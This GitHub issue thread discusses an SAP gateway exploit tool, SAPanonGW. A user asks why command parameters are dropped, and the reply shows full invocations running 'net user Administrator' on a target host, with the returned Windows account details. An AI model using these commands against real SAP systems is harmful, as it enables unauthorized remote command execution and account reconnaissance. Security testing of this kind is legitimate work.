Commands with space #1

Open
vsegdacocacola opened this issue Apr 23, 2020 · 1 comment

Comments

@vsegdacocacola

I am currently playing with the exploit.
One-word commands are working perfectly, but when I try to run commands with parameters, it seems to ignore them. For example, whoami returns the username, but whoami --help also returns the username.

Is it possible to encode the command string so that parameters after a space are also passed?

@randomstr1ng

Hi @vsegdacocacola,
For me it works when I try to send, e.g., "net user Administrator" or "whoami /all".

Example 1:

python SAPanonGWv2.py -t 172.20.10.100 -c "net user Administrator" -p 3300
[INFO ] [+] Sending GW_NORMAL_CLIENT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_INIT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_SEND
[INFO ] [+] Sending F_SAP_SEND2
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            30.03.2015 10:01:34
Password expires             11.05.2015 10:01:34
Password changeable          30.03.2015 10:01:34
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   30.03.2015 14:04:06

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

Example 2:

python SAPanonGWv1.py -t 172.20.10.100 -c "net user Administrator" -p 3300
[*] sending cmd:net user Administrator
User name                    Administrator

Full Name
TComment                      Built-in account for administering the computer/domain
User's comment
2Country/region code          000 (System Default)
!Account active               Yes
#Account expires              Never

1Password last set            30.03.2015 10:01:34
1Password expires             11.05.2015 10:01:34
1Password changeable          30.03.2015 10:01:34
!Password required            Yes
!User may change password     Yes

!Workstations allowed         All
Logon script
User profile
Home directory
1Last logon                   30.03.2015 14:04:06

!Logon hours allowed          All

-Local Group Memberships      *Administrators
#Global Group memberships     *None
$The command completed successfully.

The quotes did the trick for me. Maybe this will help you.
